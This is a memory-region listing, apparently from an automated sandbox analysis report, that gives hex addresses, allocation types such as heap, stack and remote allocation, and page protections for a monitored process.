97F0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8735000
unkown
page read and write
9480000
trusted library allocation
page read and write
50C5000
trusted library allocation
page execute and read and write
34F9000
heap
page read and write
56E1000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
517F000
stack
page read and write
96D0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
C424000
trusted library allocation
page read and write
A410000
trusted library allocation
page read and write
D5E000
stack
page read and write
9A00000
trusted library allocation
page read and write
A530000
trusted library allocation
page read and write
28535065000
heap
page read and write
9850000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
77A0000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
9510000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
8740000
unkown
page read and write
7B99000
unkown
page read and write
9480000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
65A8000
trusted library allocation
page read and write
2DB7000
trusted library allocation
page read and write
207E9A6E000
heap
page read and write
9610000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
86F0000
unkown
page read and write
1DDDC229000
heap
page read and write
5FEE000
trusted library allocation
page read and write
A3E000
stack
page read and write
1DDDC170000
trusted library allocation
page read and write
63967E000
stack
page read and write
A4D0000
trusted library allocation
page read and write
261654E0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
52A0000
trusted library allocation
page read and write
28A08A77000
heap
page read and write
A510000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
1EE91C6E000
heap
page read and write
94A5000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
83D7DFF000
stack
page read and write
2CA0000
heap
page read and write
28A09202000
trusted library allocation
page read and write
8700000
unkown
page read and write
9665000
trusted library allocation
page read and write
4D80000
remote allocation
page read and write
9640000
trusted library allocation
page read and write
261658E6000
heap
page read and write
3130000
trusted library allocation
page read and write
5314000
heap
page read and write
A4E0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
7E8789B000
stack
page read and write
B280000
trusted library allocation
page execute and read and write
2615FE70000
heap
page read and write
7A90000
trusted library allocation
page read and write
9D0000
heap
page read and write
5C16000
trusted library allocation
page read and write
B290000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
207E98E0000
heap
page read and write
65A6000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
820000
heap
page read and write
C582000
trusted library allocation
page read and write
52F9000
heap
page read and write
8730000
unkown
page read and write
A470000
trusted library section
page read and write
9600000
trusted library allocation
page read and write
18287262000
heap
page read and write
9730000
trusted library allocation
page read and write
4587000
heap
page read and write
50F0000
trusted library allocation
page readonly
1BC000
stack
page read and write
5BA3000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
A460000
trusted library allocation
page read and write
7B00000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9D0000
direct allocation
page read and write
A4D0000
trusted library allocation
page read and write
BD32BBC000
stack
page read and write
5F90000
trusted library allocation
page read and write
26160913000
heap
page read and write
9710000
trusted library allocation
page read and write
99D0000
trusted library allocation
page read and write
1CB89960000
trusted library allocation
page read and write
6931000
direct allocation
page read and write
5430000
trusted library allocation
page execute and read and write
77B0000
trusted library allocation
page read and write
9480000
unkown
page read and write
967F000
trusted library allocation
page read and write
4D80000
remote allocation
page read and write
5330000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
ABE000
heap
page read and write
A3F0000
trusted library allocation
page read and write
5CE2000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
9495000
unkown
page read and write
5BF8000
trusted library allocation
page read and write
5513000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
1CB89A40000
heap
page read and write
8700000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
98D7000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
2D0D000
stack
page read and write
9470000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
7F880000
trusted library allocation
page execute and read and write
7B90000
trusted library allocation
page read and write
B2A0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
8D6000
heap
page read and write
26165691000
trusted library allocation
page read and write
C4E5000
trusted library allocation
page read and write
8707000
trusted library allocation
page read and write
8BC000
heap
page read and write
C4ED000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
A490000
trusted library allocation
page read and write
261658FC000
heap
page read and write
8700000
trusted library allocation
page read and write
EE4397F000
stack
page read and write
A460000
trusted library allocation
page read and write
A4F0000
trusted library allocation
page read and write
8663000
trusted library allocation
page read and write
7BB0000
trusted library allocation
page read and write
261657D0000
remote allocation
page read and write
828000
heap
page read and write
9479000
unkown
page read and write
261656A0000
trusted library allocation
page read and write
51C2000
direct allocation
page read and write
9660000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
A420000
trusted library allocation
page read and write
1DDDC213000
heap
page read and write
28A08A02000
heap
page read and write
96C0000
trusted library allocation
page read and write
5500000
trusted library allocation
page read and write
9590000
trusted library allocation
page read and write
9665000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
97F0000
unkown
page read and write
97F5000
unkown
page read and write
8760000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
A500000
trusted library allocation
page read and write
2687B202000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
7621000
trusted library allocation
page read and write
21F7E402000
heap
page read and write
86F0000
unkown
page read and write
96D0000
trusted library allocation
page read and write
A470000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
96B0000
unkown
page read and write
479E000
trusted library allocation
page read and write
290C3FF0000
remote allocation
page read and write
A3F0000
trusted library allocation
page read and write
A5F000
heap
page read and write
95D8000
trusted library allocation
page read and write
9660000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
1CB89A41000
heap
page read and write
AF8367B000
stack
page read and write
2DD0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
9480000
trusted library allocation
page read and write
1EE91D02000
heap
page read and write
290C3FF0000
remote allocation
page read and write
AF8377D000
stack
page read and write
52BC000
heap
page read and write
8750000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
A61000
heap
page read and write
9515000
trusted library allocation
page read and write
1E0000
remote allocation
page read and write
9480000
trusted library allocation
page read and write
9970000
unkown
page read and write
96B0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
86F0000
trusted library allocation
page read and write
83CE000
stack
page read and write
99A0000
trusted library allocation
page read and write
9A30000
trusted library allocation
page read and write
28534E30000
heap
page read and write
9480000
trusted library allocation
page read and write
A4D0000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
52C0000
heap
page read and write
96E0000
trusted library allocation
page execute and read and write
9649000
trusted library allocation
page read and write
52C0000
heap
page read and write
47A4000
trusted library allocation
page read and write
9480000
unkown
page read and write
18287252000
heap
page read and write
290C5C02000
trusted library allocation
page read and write
AF835FD000
stack
page read and write
18287302000
heap
page read and write
2DC0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
3084000
heap
page read and write
2DB0000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
99D6000
trusted library allocation
page read and write
9470000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
9490000
unkown
page read and write
86F0000
unkown
page read and write
9665000
trusted library allocation
page read and write
50B0000
trusted library allocation
page read and write
630E000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
3020000
trusted library section
page read and write
A69E000
trusted library allocation
page read and write
96B0000
unkown
page read and write
28535052000
heap
page read and write
5CBE000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
A400000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
18287202000
heap
page read and write
9720000
trusted library allocation
page read and write
There are 2882 hidden memdumps, click here to show them.